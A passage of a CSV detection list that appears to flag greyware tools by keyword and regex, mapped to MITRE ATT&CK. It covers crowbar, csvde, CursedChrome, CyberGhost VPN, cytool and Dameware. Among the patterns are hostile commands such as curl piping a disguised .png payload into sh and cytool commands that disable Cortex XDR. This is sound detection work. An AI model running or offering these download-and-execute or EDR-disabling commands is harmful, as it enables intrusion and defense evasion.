TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","0","#filehash","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z" "*fc81435479e432562efbbb8ed75a397b565d70593af843bb1ac89628132c7ef7*",".{0,1000}fc81435479e432562efbbb8ed75a397b565d70593af843bb1ac89628132c7ef7.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","0","#filehash","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z" "*q3k/crowbar*",".{0,1000}q3k\/crowbar.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 
- TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","1","N/A","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z" "*useradd -rm crowbar*",".{0,1000}useradd\s\-rm\scrowbar.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","0","N/A","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z" "*runscript -raw=```curl *",".{0,1000}runscript\s\-raw\=\`\`\`curl\s.{0,1000}","greyware_tool_keyword","crowdstrike falcon","suspicious commands executed remotely by crowdstrike agent","T1033","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","6","5","N/A","N/A","N/A","N/A" "*runscript -raw=```whoami*",".{0,1000}runscript\s\-raw\=\`\`\`whoami.{0,1000}","greyware_tool_keyword","crowdstrike falcon","suspicious commands executed remotely by crowdstrike agent","T1033","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","6","5","N/A","N/A","N/A","N/A" "*csvde -f *",".{0,1000}csvde\s\-f\s.{0,1000}","greyware_tool_keyword","csvde","exports data from Active Directory Domain Services (AD DS) using files that store data in the comma-separated value (CSV) format","T1005","TA0009 - TA0007","N/A","N/A","Collection","https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc732101(v=ws.11)","1","0","N/A","N/A","9","9","N/A","N/A","N/A","N/A" "*csvde -r * -f *",".{0,1000}csvde\s\-r\s.{0,1000}\s\-f\s.{0,1000}","greyware_tool_keyword","csvde","exports data from Active Directory Domain Services (AD DS) using files that store data in the comma-separated value (CSV) format","T1005","TA0009 - TA0007","N/A","N/A","Collection","https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc732101(v=ws.11)","1","0","N/A","N/A","9","9","N/A","N/A","N/A","N/A" "*csvde.exe -f 
*",".{0,1000}csvde\.exe\s\-f\s.{0,1000}","greyware_tool_keyword","csvde","exports data from Active Directory Domain Services (AD DS) using files that store data in the comma-separated value (CSV) format","T1005","TA0009 - TA0007","N/A","N/A","Collection","https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc732101(v=ws.11)","1","0","N/A","N/A","9","9","N/A","N/A","N/A","N/A" "*csvde.exe -r * -f *",".{0,1000}csvde\.exe\s\-r\s.{0,1000}\s\-f\s.{0,1000}","greyware_tool_keyword","csvde","exports data from Active Directory Domain Services (AD DS) using files that store data in the comma-separated value (CSV) format","T1005","TA0009 - TA0007","N/A","N/A","Collection","https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc732101(v=ws.11)","1","0","N/A","N/A","9","9","N/A","N/A","N/A","N/A" "*csvde.exe"" -f *",".{0,1000}csvde\.exe\""\s\-f\s.{0,1000}","greyware_tool_keyword","csvde","exports data from Active Directory Domain Services (AD DS) using files that store data in the comma-separated value (CSV) format","T1005","TA0009 - TA0007","N/A","N/A","Collection","https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc732101(v=ws.11)","1","0","N/A","N/A","9","9","N/A","N/A","N/A","N/A" "*cmd.exe* /c echo curl https://* --output ""%temp%* --ssl no-revoke --insecure --location > ""%temp%*",".{0,1000}cmd\.exe.{0,1000}\s\/c\secho\scurl\shttps\:\/\/.{0,1000}\s\-\-output\s\""\%temp\%.{0,1000}\s\-\-ssl\sno\-revoke\s\-\-insecure\s\-\-location\s\>\s\""\%temp\%.{0,1000}","greyware_tool_keyword","curl","potential suspicious curl command - downloading payload in the temp directory","T1105 - T1059.003","TA0005","N/A","N/A","Collection","https://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*curl http://*.png -k|dd skip=2446 
bs=1|sh*",".{0,1000}curl\shttp\:\/\/.{0,1000}\.png\s\-k\|dd\sskip\=2446\sbs\=1\|sh.{0,1000}","greyware_tool_keyword","curl","potential malicious command with curl (|sh)","T1566","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://x.com/CraigHRowland/status/1782938242108837896","1","0","N/A","risk of false positive","9","10","N/A","N/A","N/A","N/A" "*curl https://*.png -k|dd skip=2446 bs=1|sh*",".{0,1000}curl\shttps\:\/\/.{0,1000}\.png\s\-k\|dd\sskip\=2446\sbs\=1\|sh.{0,1000}","greyware_tool_keyword","curl","potential malicious command with curl (|sh)","T1566","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://x.com/CraigHRowland/status/1782938242108837896","1","0","N/A","risk of false positive","9","10","N/A","N/A","N/A","N/A" "*/anyproxy.log*",".{0,1000}\/anyproxy\.log.{0,1000}","greyware_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/mandatoryprogrammer/CursedChrome","1","0","N/A","anyproxy","10","10","1403","212","2022-12-12T15:12:47Z","2020-04-26T20:55:05Z" "*/work/anyproxy/bin/anyproxy-ca --generate*",".{0,1000}\/work\/anyproxy\/bin\/anyproxy\-ca\s\-\-generate.{0,1000}","greyware_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/mandatoryprogrammer/CursedChrome","1","0","N/A","anyproxy","10","10","1403","212","2022-12-12T15:12:47Z","2020-04-26T20:55:05Z" "*anyproxy --intercept --ws-intercept *",".{0,1000}anyproxy\s\-\-intercept\s\-\-ws\-intercept\s.{0,1000}","greyware_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse 
sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/mandatoryprogrammer/CursedChrome","1","0","N/A","anyproxy","10","10","1403","212","2022-12-12T15:12:47Z","2020-04-26T20:55:05Z" "*cut -d: -f1 /etc/passwd*",".{0,1000}cut\s\-d\:\s\-f1\s\/etc\/passwd.{0,1000}","greyware_tool_keyword","cut","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*\AppData\Local\CyberGhost*",".{0,1000}\\AppData\\Local\\CyberGhost.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within corporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A" "*\Applications\VPN\Data\OpenVPN\*",".{0,1000}\\Applications\\VPN\\Data\\OpenVPN\\.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within corporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A" "*\Applications\VPN\tunnel.dll*",".{0,1000}\\Applications\\VPN\\tunnel\.dll.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within corporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A" "*\Applications\VPN\wireguard.dll*",".{0,1000}\\Applications\\VPN\\wireguard\.dll.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage 
within corporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A" "*\CyberGhost 6.lnk*",".{0,1000}\\CyberGhost\s6\.lnk.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within corporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A" "*\CyberGhost 7.lnk*",".{0,1000}\\CyberGhost\s7\.lnk.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within corporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A" "*\CyberGhost 8.lnk*",".{0,1000}\\CyberGhost\s8\.lnk.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within corporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A" "*\CyberGhost.VPN.*.exe*",".{0,1000}\\CyberGhost\.VPN\..{0,1000}\.exe.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within corporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A" "*\CyberGhost-WireGuard-1.conf*",".{0,1000}\\CyberGhost\-WireGuard\-1\.conf.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within corporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A" "*\Dashboard.exe.config*",".{0,1000}\\Dashboard\.exe\.config.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage 
within corporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A" "*\Program Files\CyberGhost*",".{0,1000}\\Program\sFiles\\CyberGhost.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within corporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A" "*\Windows\Temp\*\wireguard.sys*",".{0,1000}\\Windows\\Temp\\.{0,1000}\\wireguard\.sys.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within corporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A" "*>CyberGhost 6 Installer<*",".{0,1000}\>CyberGhost\s6\sInstaller\<.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within corporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A" "*>CyberGhost 7 Installer<*",".{0,1000}\>CyberGhost\s7\sInstaller\<.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within corporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A" "*>CyberGhost 8 Installer<*",".{0,1000}\>CyberGhost\s8\sInstaller\<.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within corporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A" 
"*api.cyberghostvpn.com*",".{0,1000}api\.cyberghostvpn\.com.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within corporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","1","N/A","N/A","9","8","N/A","N/A","N/A","N/A" "*CyberGhost 6 Service*",".{0,1000}CyberGhost\s6\sService.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within corporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","Windows Service Name installed","9","8","N/A","N/A","N/A","N/A" "*CyberGhost 7 Service*",".{0,1000}CyberGhost\s7\sService.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within corporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","Windows Service Name installed","9","8","N/A","N/A","N/A","N/A" "*CyberGhost 8 Service*",".{0,1000}CyberGhost\s8\sService.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within corporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","Windows Service Name installed","9","8","N/A","N/A","N/A","N/A" "*CyberGhost S.R.L.*",".{0,1000}CyberGhost\sS\.R\.L\..{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within corporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A" "*CyberGhost Tunnel Client:*",".{0,1000}CyberGhost\sTunnel\sClient\:.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within corporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense 
Evasion","https://www.cyberghostvpn.com/","1","0","N/A","Windows Service Name installed","9","8","N/A","N/A","N/A","N/A" "*cyberghost*\Dashboard.exe*",".{0,1000}cyberghost.{0,1000}\\Dashboard\.exe.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within corporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A" "*cyberghost*\Dashboard.Service.exe*",".{0,1000}cyberghost.{0,1000}\\Dashboard\.Service\.exe.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within corporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A" "*cyberghost*\wyUpdate.exe*",".{0,1000}cyberghost.{0,1000}\\wyUpdate\.exe.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within corporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A" "*CyberGhost.Browser.dll*",".{0,1000}CyberGhost\.Browser\.dll.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within corporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A" "*CyberGhost.exe*",".{0,1000}CyberGhost\.exe.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within corporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","1","N/A","N/A","9","8","N/A","N/A","N/A","N/A" "*CyberGhost.resources.dll*",".{0,1000}CyberGhost\.resources\.dll.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within corporate network","T1567 
- T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A" "*CyberGhost.Service.exe*",".{0,1000}CyberGhost\.Service\.exe.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within corporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","1","N/A","N/A","9","8","N/A","N/A","N/A","N/A" "*CyberGhost.Service.InstallLog*",".{0,1000}CyberGhost\.Service\.InstallLog.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within corporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A" "*CyberGhost.Service.pdb*",".{0,1000}CyberGhost\.Service\.pdb.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within corporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A" "*CyberGhost.VPNServices.dll*",".{0,1000}CyberGhost\.VPNServices\.dll.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within corporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","N/A","9","8","N/A","N/A","N/A","N/A" "*CyberGhost6Service*",".{0,1000}CyberGhost6Service.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within corporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","Windows Service Name installed","9","8","N/A","N/A","N/A","N/A" "*CyberGhost7Service*",".{0,1000}CyberGhost7Service.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN 
usage within corporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","Windows Service Name installed","9","8","N/A","N/A","N/A","N/A" "*CyberGhost8Service*",".{0,1000}CyberGhost8Service.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within corporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","Windows Service Name installed","9","8","N/A","N/A","N/A","N/A" "*CyberGhostTunnel$CyberGhost-WireGuard-1*",".{0,1000}CyberGhostTunnel\$CyberGhost\-WireGuard\-1.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within corporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","Windows Service Name installed","9","8","N/A","N/A","N/A","N/A" "*CyberGhostVPNSetup.exe*",".{0,1000}CyberGhostVPNSetup\.exe.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within corporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","1","N/A","N/A","9","8","N/A","N/A","N/A","N/A" "*CyberGhost-WireGuard-1.conf*",".{0,1000}CyberGhost\-WireGuard\-1\.conf.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within corporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","0","N/A","Windows Service Name installed","9","8","N/A","N/A","N/A","N/A" "*download.cyberghostvpn.com*",".{0,1000}download\.cyberghostvpn\.com.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within corporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense
Evasion","https://www.cyberghostvpn.com/","1","1","N/A","N/A","9","8","N/A","N/A","N/A","N/A" "*feedback.cyberghostvpn.com*",".{0,1000}feedback\.cyberghostvpn\.com.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within corporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","1","N/A","N/A","9","8","N/A","N/A","N/A","N/A" "*ffbkglfijbcbgblgflchnbphjdllaogb*",".{0,1000}ffbkglfijbcbgblgflchnbphjdllaogb.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*payment.cyberghostvpn.com*",".{0,1000}payment\.cyberghostvpn\.com.{0,1000}","greyware_tool_keyword","CyberGhost VPN","External VPN usage within corporate network","T1567 - T1090","TA0003 - TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","Defense Evasion","https://www.cyberghostvpn.com/","1","1","N/A","N/A","9","8","N/A","N/A","N/A","N/A" "*cytool.exe event_collection disable*",".{0,1000}cytool\.exe\sevent_collection\sdisable.{0,1000}","greyware_tool_keyword","cytool","Disables event collection","T1562.001 - T1547.001 - T1055.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "*cytool.exe protect disable*",".{0,1000}cytool\.exe\sprotect\sdisable.{0,1000}","greyware_tool_keyword","cytool","Disables protection on Cortex XDR files processes registry and services","T1562.001 - T1547.001 - T1055.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "*cytool.exe runtime
disable*",".{0,1000}cytool\.exe\sruntime\sdisable.{0,1000}","greyware_tool_keyword","cytool","Disables Cortex XDR (Even with tamper protection enabled)","T1562.001 - T1547.001 - T1055.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "*cytool.exe startup disable*",".{0,1000}cytool\.exe\sstartup\sdisable.{0,1000}","greyware_tool_keyword","cytool","Disables the Cortex agent on startup","T1562.001 - T1547.001 - T1055.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "*namfblliamklmeodpcelkokjbffgmeoo*",".{0,1000}namfblliamklmeodpcelkokjbffgmeoo.{0,1000}","greyware_tool_keyword","Daily VPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "* /monitor /from_service /cpu_memory_refresh * /disk_space_refresh * /proc_list_refresh * /semkey *",".{0,1000}\s\/monitor\s\/from_service\s\/cpu_memory_refresh\s.{0,1000}\s\/disk_space_refresh\s.{0,1000}\s\/proc_list_refresh\s.{0,1000}\s\/semkey\s.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* /r /proxy /proxyport /proxyusername /proxypasswd *",".{0,1000}\s\/r\s\/proxy\s\s\/proxyport\s\s\/proxyusername\s\s\/proxypasswd\s.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered
Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* /register /proxy /proxyport /proxyusername /proxypasswd*",".{0,1000}\s\/register\s\s\/proxy\s\s\/proxyport\s\s\/proxyusername\s\s\/proxypasswd.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "* -a tcrmtshellagentmodule_*",".{0,1000}\s\-a\stcrmtshellagentmodule_.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","Dameware Remote Support","10","10","N/A","N/A","N/A","N/A" "* Dameware Mini Remote Control x64 -- Installation completed successfully*",".{0,1000}\sDameware\sMini\sRemote\sControl\sx64\s\-\-\sInstallation\scompleted\ssuccessfully.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","Dameware Remote Support","10","10","N/A","N/A","N/A","N/A" "* -log-level trace -dre -log-path *",".{0,1000}\s\-log\-level\strace\s\-dre\s\-log\-path\s.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","Dameware Remote Support","10","10","N/A","N/A","N/A","N/A" "* tkc_agent_dre.deb*",".{0,1000}\stkc_agent_dre\.deb.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*.exe --pn dre_video_uploader --logpath logs*",".{0,1000}\.exe\s\-\-pn\sdre_video_uploader\s\-\-logpath\slogs.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*.mspa.n-able.com*",".{0,1000}\.mspa\.n\-able\.com.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/damewareagent.exe*",".{0,1000}\/damewareagent\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Remote Control utilities","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/fr/remote-support-software","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/DWMRC_St_64.msi*",".{0,1000}\/DWMRC_St_64\.msi.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","1","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" "*/DWRCC.exe*",".{0,1000}\/DWRCC\.exe.{0,1000}","greyware_tool_keyword","Dameware","Solarwind Dameware Mini Remote Control tool ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://www.solarwinds.com/dameware-mini-remote-control","1","1","N/A","Dameware Mini Remote Control","10","10","N/A","N/A","N/A","N/A" 